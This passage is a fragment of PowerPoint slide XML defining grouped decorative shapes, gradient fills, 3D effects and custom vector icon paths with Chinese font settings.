        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
